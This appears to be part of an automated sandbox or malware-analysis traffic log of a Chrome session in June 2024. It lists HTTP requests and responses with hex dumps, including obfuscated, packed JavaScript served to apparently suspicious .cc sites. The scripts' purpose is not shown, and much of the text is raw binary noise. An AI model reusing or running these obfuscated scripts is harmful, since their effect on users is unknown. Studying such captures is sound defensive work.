                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: 41 18 63 72 61 16 c7 8e 1c c6 da ca 32 7e f2 4b 3f 8e 0c 84 34 55 68 b4 da 48 e2 0c f1 20 84 a2 26 28 3f 79 32 c7 f5 62 12 f7 ff be d2 fe a3 71 7f 78 80 c1 7c c5 10 02 6b e8 33 dd 30 9c b8 78 76 05 f5 64 80 f9 bd fb 10 0e 13 2c af 6f 21 4a 01 0f 29 c6 5d 0e 5e df 40 61 b0 8d 03 49 88 c5 ce 2a aa d1 10 3a 55 88 93 08 50 09 88 3b 60 c4 c1 84 84 cf 38 62 9d c1 53 06 f5 ad 06 fe f9 af fc 73 d4 6b 75 18 66 c0 24 8d 78 99 e4 30 a9 42 96 24 18 0e 07 b0 8c 20 1d 0f ae eb 63 65 65 1d 7c 27 b2 93 a9 0c ca 68 08 d7 81 c9 14 ac b5 28 95 4a 88 c3 04 81 ef 02 c6 c0 a8 0c bd e1 00 20 03 e6 4a 8c f2 b3 2d 04 34 04 2c b6 b7 b6 50 75 66 10 78 1e ee 2d 2f e3 37 7f e3 9f a1 db ac a1 dd ae a3 3a 3d 8e 73 57 ae 80 17 2a 58 3c 36 84 af 13 4c e7 81 4b 37 2f f0 87 f6 1f c2 78 b5
                                                                                                                                                          Data Ascii: Acra2~K?4UhH &(?y2bqx|k30xvd,o!J)]^@aI*:UP;`8bSskuf$x0B$ cee|'h(J J-4,Pufx-/7:=sW*X<6LK7/x
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: e7 67 4b 66 73 75 4f 65 61 8c 85 5c cb c2 b5 f2 4f 7c dc b3 58 5d 5a 9a d7 13 f0 e6 17 bf fa e2 bc 17 0c 53 af 72 da b8 81 a3 86 a3 2c f1 4b ae 70 15 a6 5a e1 5f 8d 22 81 53 f2 37 9c 6a 69 5c 9f f4 4f c5 31 79 1c c7 2f 35 9b cd ff d9 55 0e d2 f2 55 29 e5 d1 cc e4 9f 9a 28 95 e7 8e 1f 3f ee 5e b8 70 01 e5 4b b4 b5 ef a4 84 7e 5f 4e 87 a4 d8 7c ed 6e 6d 51 76 5d 6a 81 8f 23 32 94 49 78 f6 a9 67 38 73 62 91 c1 30 e1 e2 ea 6d d6 d7 d7 a8 57 2a 9c 38 72 94 bd ed 1d 46 dd 3e c7 8f 1c e5 da 85 4b 74 fa 1d ce bf fa 3a ca af 32 08 33 26 6a 3e ca 73 e9 51 63 5c 9a 21 d0 0e 6e 2e 60 a4 89 c7 29 be 76 10 56 21 ac 40 cb c2 0b c3 28 70 84 42 59 4b bf d7 a5 ec fa 04 9e 8f 90 85 c8 d0 c4 09 0d 37 a0 9c 68 a2 30 46 a6 19 22 4d 50 52 63 8c 61 30 18 30 18 0c 88 a3 02 ef 95
                                                                                                                                                          Data Ascii: gKfsuOea\O|X]ZSr,KpZ_"S7ji\O1y/5UU)(?^pK~_N|nmQv]j#2Ixg8sb0mW*8rF>Kt:23&j>sQc\!n.`)vV!@(pBYK7h0F"MPRca00
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: 99 cd 99 3e 75 04 e3 fb dc bc 79 85 f3 83 55 1c 21 69 55 67 f0 b5 21 98 af e1 d2 c4 15 73 7c fb b9 d7 69 ea 0a cd 52 83 71 92 13 54 9b 54 9b 0d 8e 9f 38 03 ae 9f bd f9 d6 95 2f 0b 59 5e f2 fc ea 84 57 2a 6f 26 69 fe 6f fc 4a fd 75 c7 f3 1f f3 2b d5 a9 76 af fb 4b c3 38 f1 1a 81 7f c9 1b d8 b2 1d 27 54 eb ad 28 4c 33 3d 1e e4 76 a2 ee 09 93 80 8b b0 ed 9d 3e 41 1e 8a 44 4e 8c 4a ae d2 00 97 af ae 88 e3 a7 0e 58 89 a0 56 2e 04 c6 ce 1f eb 18 1c bf 54 3c f9 dc 8f 7d fc fc 37 be f1 8d bb 97 ae 5c 3f d0 6a b5 6a 5b bb 9b c7 9a cd 56 39 4d d3 77 d5 6a 35 af b7 b5 76 c8 51 aa e6 2a 67 2a cb 32 d7 98 7e 94 1b 2c 52 a9 90 4e 2f de 75 36 a2 28 d2 6b 42 5a df 2f 79 c0 5e 94 e8 5d 57 56 7f f4 c5 af 7d e3 5a 10 04 1f 8e fc ee 9b fd de f0 0b ca 51 e3 70 1c 4e 06 b5 4a
                                                                                                                                                          Data Ascii: >uyU!iUg!s|iRqTT8/Y^W*o&ioJu+vK8'T(L3=v>ADNJXV.T<}7\?jj[V9Mwj5vQ*g*2~,RN/u6(kBZ/y^]WV}ZQpNJ
                                                                                                                                                          2024-06-09 22:41:25 UTC6499INData Raw: 3f f7 e6 f5 51 7f ee 8e 93 ff d0 77 7a 0f df f3 91 8f 31 2e e1 f5 97 de 24 3a 70 95 a3 72 25 d1 34 59 22 11 25 42 1a 92 2c 05 a3 70 5a 30 2e 0a b6 87 7d ac 0f 0c 07 35 79 92 23 62 c0 95 63 ee 3a 72 80 ae 84 cd 95 ab d7 6f 5c 78 f3 df 9f 6c af be 58 8f 76 55 96 27 7e 69 61 c1 dd 79 ec 0e 77 f2 f8 f1 70 e4 d0 c1 78 f6 cc 99 f8 d4 27 3f 11 ad 6f f2 bd de 37 e3 56 bf 1f d3 b7 97 8a 77 77 77 45 88 41 7a e7 55 08 41 29 ad 74 8c d1 f8 e0 4d 08 21 89 31 a6 21 84 44 08 91 0a 21 d2 29 68 93 e9 31 f3 c2 3a c6 b8 07 e0 28 50 5a 6b e5 6c 25 95 d1 62 63 b3 ff f9 03 fb e6 0f a0 e2 f1 58 4d 59 46 be 85 45 c1 bb 52 b1 4c c5 c1 68 fe 1f 91 a0 5b 08 99 20 a3 46 46 45 26 ba 6c 6e 4c ae 9f bf 78 73 25 4d 8f 2d 0a 2b 62 66 d4 a4 d5 69 13 a5 ac 95 da 1b 1b 14 d6 da 4e f0 4c c4
                                                                                                                                                          Data Ascii: ?Qwz1.$:pr%4Y"%B,pZ0.}5y#bc:ro\xlXvU'~iaywpx'?o7VwwwEAzUA)tM!1!D!)h1:(PZkl%bcXMYFERLh[ FFE&lnLxs%M-+bfiNL


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          727192.168.2.55051018.66.147.1214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC372OUTGET /ocs/cc.png?1717972881233 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aws.bakeddove.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:26 UTC486INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 da78abc509aafffb42eec33ca2dc60d4.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                                          X-Amz-Cf-Id: wXsHOMlgsgMSlx0rjG47KpdHHh70s27H12iEWReTBLPpZhemziTspw==
                                                                                                                                                          2024-06-09 22:41:26 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          728192.168.2.55051123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC557OUTGET /pc/240516-03/static/js/components/imageLoader.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 860
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:50 GMT
                                                                                                                                                          ETag: "6645caca-35c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,1],EU-FRA-paris-GLOBAL1-CACHE3[21],EU-FRA-paris-GLOBAL1-CACHE24[0,TCP_HIT,19],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2487280
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 4e330a167ad8c9732d231da6118c001d
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 104720
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC860INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 5a 6e 77 42 59 42 64 41 47 67 47 38 41 4e 41 61 51 45 63 42 4c 41 4c 67 44 4d 42 58 4e 47 41 46 77 66 55 79 37 49 67 41 6c 42 51 43 2b 5a 41 4f 5a 73 51 41 45 56 59 64 75 76 4e 50 30 46 6b 47 49 67 45 52 73 6b 49 41 41 52 49 75 41 4a 77 62 63 4e 41 62 67 44 79 59 41 46 59 68 75 41 4f 67 41 6d 49 46 67 7a 51 67 41 43 6f 5a 51 51 51 68 72 67 43 65 6d 43 42 6b 47 67 44 36 59 53 42 49 41 4c 49 6f 6a 6d 77 41 4e 69 41 61 6c 41 42 75 55 41 6e 53 54 41 43 45 41 41 79 69 51 6d 62 70 68 72 70 6f 41 4c 77 4d 6d 42 71 35 4d 42 41 73 47 6b 4a 6b 68 6d 57 59 41 4d 70 47 62 68 4b 55 45 4e 34 51 53 45 77 55 53 49 59 77 54 4f 33 47 61 42 4c 69 6a 6c 42
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZnwBYBdAGgG8ANAaQEcBLALgDMBXNGAFwfUy7IgAlBQC+ZAOZsQAEVYduvNP0FkGIgERskIAARIuAJwbcNAbgDyYAFYhuAOgAmIFgzQgACoZQQQhrgCemCBkGgD6YSBIALIojmwANiAalABuUAnSTACEAAyiQmbphrpoALwMmBq5MBAsGkJkhmWYAMpGbhKUEN4QSEwUSIYwTO3GaBLijlB


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          729192.168.2.55051290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC556OUTGET /pc/240516-03/static/js/components/imageLoader.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC640INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 860
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:50 GMT
                                                                                                                                                          ETag: "6645caca-35c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE2[288],EU-GER-frankfurt-GLOBAL1-CACHE7[285,TCP_MISS,287],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 81a0fa8d40596fcbe5e5af5934be4ae6
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1823403
                                                                                                                                                          X-CCDN-Expires: 768597
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC860INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 5a 6e 77 42 59 42 64 41 47 67 47 38 41 4e 41 61 51 45 63 42 4c 41 4c 67 44 4d 42 58 4e 47 41 46 77 66 55 79 37 49 67 41 6c 42 51 43 2b 5a 41 4f 5a 73 51 41 45 56 59 64 75 76 4e 50 30 46 6b 47 49 67 45 52 73 6b 49 41 41 52 49 75 41 4a 77 62 63 4e 41 62 67 44 79 59 41 46 59 68 75 41 4f 67 41 6d 49 46 67 7a 51 67 41 43 6f 5a 51 51 51 68 72 67 43 65 6d 43 42 6b 47 67 44 36 59 53 42 49 41 4c 49 6f 6a 6d 77 41 4e 69 41 61 6c 41 42 75 55 41 6e 53 54 41 43 45 41 41 79 69 51 6d 62 70 68 72 70 6f 41 4c 77 4d 6d 42 71 35 4d 42 41 73 47 6b 4a 6b 68 6d 57 59 41 4d 70 47 62 68 4b 55 45 4e 34 51 53 45 77 55 53 49 59 77 54 4f 33 47 61 42 4c 69 6a 6c 42
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZnwBYBdAGgG8ANAaQEcBLALgDMBXNGAFwfUy7IgAlBQC+ZAOZsQAEVYduvNP0FkGIgERskIAARIuAJwbcNAbgDyYAFYhuAOgAmIFgzQgACoZQQQhrgCemCBkGgD6YSBIALIojmwANiAalABuUAnSTACEAAyiQmbphrpoALwMmBq5MBAsGkJkhmWYAMpGbhKUEN4QSEwUSIYwTO3GaBLijlB


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          730192.168.2.55047738.174.148.24434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC345OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                          Host: f21714.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:25 UTC34INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: no-cache,no-store
                                                                                                                                                          2024-06-09 22:41:25 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8
                                                                                                                                                          2024-06-09 22:41:25 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:41:25 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                                                                                                                          Data Ascii: Transfer-Encoding: chunked
                                                                                                                                                          2024-06-09 22:41:25 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:
                                                                                                                                                          2024-06-09 22:41:25 UTC5INData Raw: 35 38 62 0d 0a
                                                                                                                                                          Data Ascii: 58b
                                                                                                                                                          2024-06-09 22:41:25 UTC1426INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 32 3b 75 72 6c 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 5f 5f 43 42 4b 3d 33 64 32 35 33 35 37 39 32 32 39 33 64 36 30 38 65 66 38 38 30 32 65 35 38 37 38 38 37 36 33 65 63 31 37 31 37 39 37 32 38 38 36 5f 31 32 31 33 37 35 35 31 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2e 73 6b 2d 74 68 72 65 65 2d 62 6f 75 6e 63 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 74 6f 70 3a 20 35 30 25 3b 0a 09 6c 65 66 74 3a 20 35 30 25 3b 0a 09 0a 09 6d 61 72 67 69 6e 3a 20 34 30 70 78 20 61 75 74 6f
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="refresh" content="2;url=/favicon.ico?__CBK=3d2535792293d608ef8802e58788763ec1717972886_12137551" /><style type="text/css">.sk-three-bounce {position: absolute;top: 50%;left: 50%;margin: 40px auto


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          731192.168.2.55051390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC549OUTGET /pc/240516-03/static/js/t4043-subNav-js.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC627INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 712
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:01:35 GMT
                                                                                                                                                          ETag: "6645cb6f-2c8"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[4],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE11[3],EU-FRA-paris-GLOBAL1-CACHE24[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063151
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: aef551da81840fd3dae3abc0846f7e65
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528849
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC712INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 7a 41 46 6e 77 46 30 41 61 41 62 77 43 31 67 42 4e 41 4c 77 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 54 45 45 74 45 75 77 43 55 5a 41 45 54 4d 6b 49 41 41 52 4a 32 41 4a 30 34 64 52 41 62 67 44 79 59 41 46 59 67 4f 41 4f 67 41 6d 49 52 70 7a 51 67 41 43 6e 4a 51 51 51 63 39 67 45 39 4d 41 30 51 48 30 6e 49 4a 41 46 6b 55 65 35 67 42 73 51 6f 38 67 41 33 4b 42 39 6d 45 48 6f 41 51 67 41 47 41 46 38 68 51 58 30 48 45 6c 45 41 57 78 41 30 5a 67 41 5a 54 6c 6b 41 6c 6a 59 75 48 68 45 35 45 48 5a 6d 4f 54 51 70 47 44 69 45 76 53 54 52 64 6b 73 41 53 52 53 41 63 7a 7a 57 44 6d 34 30 54 47 4c 53 38 73 71 55 47 76 5a 45 78 7a 41 55 64 6b 61 55 6c 76
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAzAFnwF0AaAbwC1gBNALwC4AzAVzRgBcBLdTEEtEuwCUZAETMkIAARJ2AJ04dRAbgDyYAFYgOAOgAmIRpzQgACnJQQQc9gE9MA0QH0nIJAFkUe5gBsQo8gA3KB9mEHoAQgAGAF8hQX0HElEAWxA0ZgAZTlkAljYuHhE5EHZmOTQpGDiEvSTRdksASRSAczzWDm40TGLS8sqUGvZExzAUdkaUlv


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          732192.168.2.55051490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC612OUTGET /pc/image-pc/index/125/footer/footer_logo.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 13310
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 02:47:59 GMT
                                                                                                                                                          ETag: "64bf37df-33fe"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[4],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE25[4],EU-FRA-paris-GLOBAL1-CACHE22[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063151
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 10542dd3f6d8fff2db6ebda2adfd8696
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528849
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC13310INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 2e 00 00 00 65 08 03 00 00 00 9c 1a 47 ab 00 00 03 00 50 4c 54 45 47 70 4c e0 e1 e1 d4 d6 d3 e8 ea ea ab ab ab 8f 8f 8f 81 81 81 d8 d8 d8 f0 f0 ef b5 b5 b5 ef ef ee fb fb fa e3 e3 e3 c2 c2 c1 f2 f2 f2 c4 c4 c4 cf c2 b4 75 75 75 b8 c7 c4 87 87 87 a4 a4 a4 7e 7e 7e e4 e4 e4 cf cf cf 9a 9a 9a b9 b9 b9 aa 81 54 f4 91 07 aa be b9 a1 b5 b0 ac ac ac 94 ad a7 f1 92 0a c3 d0 ce 39 67 5d 61 61 61 88 a4 9e 13 49 3d ce d9 d5 9a 9a 9a f8 91 06 f7 91 05 7b 9a 93 17 48 92 f6 91 07 07 4e ab 6b 6b 6b 76 76 76 0c 50 a6 11 49 a6 f7 91 0f f8 91 07 5a 80 78 04 4f af 2c 5d 52 47 72 68 61 85 7e 1f 54 48 52 79 73 f7 91 08 f6 91 08 19 54 9f f4 90 07 8b 8b 8b f6 91 0b 0e 4b 9d 9a 9a 9a 72 93 8d 6a 8c 85 b9 b5 99 0f 4e a7 f6
                                                                                                                                                          Data Ascii: PNGIHDR.eGPLTEGpLuuu~~~T9g]aaaI={HNkkkvvvPIZxO,]RGrha~THRysTKrjN


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          733192.168.2.55052090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
